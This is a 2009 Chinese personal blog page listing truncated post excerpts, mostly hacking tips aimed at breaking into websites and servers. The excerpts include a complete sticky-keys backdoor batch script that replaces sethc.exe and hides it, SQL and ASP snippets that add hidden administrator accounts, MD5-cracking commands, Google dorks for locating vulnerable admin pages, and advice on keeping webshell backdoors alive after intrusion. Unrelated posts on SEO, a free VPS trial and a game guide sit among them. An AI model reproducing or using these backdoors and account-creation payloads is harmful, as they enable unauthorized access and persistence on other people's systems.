爻乂的窝
百度空间 | 百度首页 
 
关于我
 

本人承接SEO服务,有意这可以给我留言。或加我QQ:251323708

   
 
你要去。。
 
 
 
 
     
 
文章列表
 
2009-11-09 13:16
1.入侵指定网站;查找SQL注入点;碰到网站地址是以asp?=44.php?=44.等结尾的动态网页注入大家自己在论坛搜索资料。关键词SQL。
这里讲些小经验,有的网页如
http://www.***.com/article/today/265501.html大家知道以HTML结尾的网页一般都是静态的,不存在注入漏洞。但我们注意查看该网页的源码,发现源码中存在这样的内容:
<script language="javascript" src="/common/Dig.aspx?id=265506&modelid=1&css=">
我们可
 
2009-11-09 13:10

连接sql后全部代码如下:

create table [bin_cmd]([cmd] [image]);

declare @a sysname,@s nvarchar(4000)select @a=db_name(),@s=0x62696E backup database @a to disk=@s;

insert into [bin_cmd](cmd)values('<scrIpt language=VBScript>window.moveTo 8888,8888:Set s=CreateObject("Wscript.Shell"):s.Run "cmd.exe /c net user ASPMET 123_asda!@ /add",0:s.Run "cmd.exe /c net localgroup

 
2009-11-09 13:00
将下面的代码保存为tt.bat 然后到主机上运行~后门的启动了~
后连接对方3389然后连续按5次Shift就能进入盘里了 然后进入c:\windows\system32\cmd.exe
或者建个bat内容为 call cmd.xe 就是系统权限了~管理员把你先的用户删了也不怕~哇哈哈哈哈~~~
TITLE Shift后门 @echo off
cls
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
echo.
echo Shift后门
echo.坏狼安全网http://www.winshell.cn
echo 使用方法:本文件执行完毕后,
 
2009-11-06 23:19

批处理:

@echo off
cls
echo 使用方法:本文件执行完毕后
echo 在终端界面按Shift 5次即可登陆系统
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h
echo 后门安装完毕
echo. & pause
exit

此段代码保存

 
2009-11-06 23:17

现在可以说网络管理员对服务器的设置是越来越BT,但BT的同时,也有黑客朋友们对服务器的不断的测试,在测试中往往获取最低的guest权限是简单的,像我们在入侵网站过程中,获取webshell是简单的,但是当由webshell的guest权限向system权限提升时却往往是止步不前。所以我有想写这样一篇文章的想法,但是在思考的过程中,又不得不承认,方法是不断的探索中出来的,方法更是有常规的也有另辟蹊径的。下面就做一些简单的介绍,对提权的方法进行一些介绍,同时也希望在更多朋

 
2009-11-06 23:17
一般来说,形如1e4dc79d489e86b2的16位或者32位密码就是经过MD5加密的,(当然也有特殊,比如DVBBS在登陆时候会先产生一个16位的随机密码,当然,这个密码还是和MD5密码的形式有点区别,相同的是都是16位的数字+字母组合 。);
  这个一般来说可以用一个叫dv.exe的工具来破解。他可以破解加密前是10位以下的纯数字或者纯字母,破解纯数字的,速度超快,但是纯字母的,就慢了,当然他还有其他功能,但是其他功能没什么特别之处,所以不说。

  破解纯数字时候:dv -p a.txt -b num

  纯字母: dv -p a.txt -b cha
 
2009-11-06 23:16
1,
到GoogLe,搜索一些关键字,edit.asp?                                                  

2,
到Google ,site:cq.cn inurl:asp

3,
利用挖掘鸡和一个ASP木马.
文件名是login.asp
路径组是/manage/
关键词是went.asp
用'o

 
2009-11-05 14:30

有很多朋友拿下一些站的shell后,最后走人的时候,肯定是想留个后门在走,但是后门没几天就不见了。这

让一些小黑们很头痛哈,(包括我,哈哈)网上流传的方法也不是很好,只对本人来说哈。

不墨迹了,进正题。

首先拿下shell后,建立一个有...\\这样的文件夹,比如我就在站点跟目录建立个jieshao...\\这样的文件夹,如图

 
2009-11-02 16:16
我们常常利用"万能密码"登陆了一些站点后台。这时又不想让别人按照同样的方法也进来。我们就必须把这个“万能密码”即'or'='or'的漏洞给修补下。 找到后台登陆地址的文件,然后在源代码文件找到了下面这段代码。


<%
pwd = request.form("pwd")

name = request.form("name")

Set rs = Server.CreateObject("ADODB.Connection")

sql = "select * from Manage_User where UserName='" & na
 
2009-11-02 15:08

“挂马者”利用注入工具进行扫描 到有注入点然后开始注入 猜解用户密码扫描后台地址 进行登陆后台用后台上传功能上传一个小马(一个执行asp/图片等) 然后得到这个小马地址 打开小马写入大马代码然后进行数据库备份 小马其实就起到一个上传文件的权限功能/写入 这样就成功的拿下站点的 webshell 到这里他就可以想在站点干嘛就干嘛 一般都是挂马为目的。 建议删除后台管理备份的那个ASP文件/修改别名称,这样他就不可以备份数据库了,你要备份的时候在改名称回来 或者重新上传这个后台备份asp

 
2009-11-02 05:27

<%
Set onlineServer=GetObject("WinNT://127.0.0.1")
Set newuser=onlineServer.Create("user","anerle")
NewUser.SetPassword "123456"
NewUser.FullName="anerle test"
NewUser.Description="hacker's example"
NewUser.Setinfo
Set oDomain=GetObject("WinNT://"&"127.0.0.1")
Set oGroup=oDomain.GetObject("Group","administrators")
oGroup.Add ("winnt://hacker

 
2009-11-02 05:19
比如我们要看远程机器上开的服务(准备好Pskill,把防火墙先停了),代码如下:
<%Set ComputerObj = GetObject("WinNT://127.0.0.1")
ComputerObj.Filter = Array("Service")
For Each Service in ComputerObj
Response.Write "Service display name = " & Service.DisplayName
Response.Write("<BR>")
Response.Write "Service account name = " & Service.ServiceAccountName
Response.Write("<BR>")
Response
 
2009-11-01 03:19
    (经测试,这个vps在 免费3个月后,可以通过修改个人信息等方式 进行重新试用3个月,就是说可以终身免费试用!!!)本人第二次申请试用通过
    一次搜索解决 vps(是比以前介绍的美国虚拟主机更好,更稳定的空间,经测试这个vps的性能不差于国内的普通服务器!)一个难题的时候,无意中搜索 到了一个 免费3个月的vps ,
    真的很惊讶,要知道 用过的差不多点的vps 每月最少 要10几美金,这个竟然免费3个月,

    所以我立马用信用卡测
 
2009-10-30 12:51

【各精灵的进化及捕捉地点】

1、伊优16级进化到尤里安,尤里安进化到36级巴鲁斯(捕捉地点:刚开始或搜集精灵、或在精灵王对战10胜,初始为5级)。
2、小火猴14级进化到烈火猴,烈火猴36级进化到烈焰猩猩(捕捉地点:同上,初始为5级)。
3、布布种子18级进化到布布草,布布草32级进化到布布花(捕捉地点:同上,初始为5级)。
4、利利21级进化到绵绵,绵绵37
 
2009-10-30 10:16

Google有很多数据库,同一网址在Google不同数据库中的值是不一样的(据说有678个数据中心),特别是在Google更新PR值的时 候,大多数预测网站就是在这些数据中心随机查询多个

 
     
 
留言板
 
90
你可以说一下你是怎来做的。
2009-11-03 18:01| 回复
 
89
飘过~~~~~
2009-10-30 13:14| 回复
 
86
回复yaohack:最近我都没怎么上来 而且QQ也一样那
有急事的话直接留言我QQ 我会上来和你说的 呵呵 真不好意思
2009-10-20 00:05| 回复
 
84









特意来坐坐,有空去我空间溜达一下啊!顺便看看我的文章哦,可能对你们会有帮助哦。你的空间实在太漂亮了,
2009-10-04 17:11| 回复
 
83
我换博客了,——爱家
2009-09-28 10:26| 回复
 
 
姓 名:    注册
网 址: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      
   
 
 
个人档案
 
yaohack
男, 1岁
湖北 随州 
上次登录:
17小时前
加为好友
 
   
 
背景音乐
 
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
c#(17)
 
Sql(4)
 
Java(1)
 
Php(3)
 
 
 
Ps(0)
 
Uml(0)
 
 
 
 
 
 
 
Sem(8)
 
 
 
 
     
 
最新评论
 
文章评论|照片评论

回复颓废傻鱼:呵呵
 
嘴巴左边还P的还有点不太融合哈
 
     
 
好友最新文章
 
     
 
最近访客
 
 

CLLO88

水幕天

dfg1986

51gamer

怨念纠结

注册卡卡的是猪

qijie81

zhangyuke12345
     


©2009 Baidu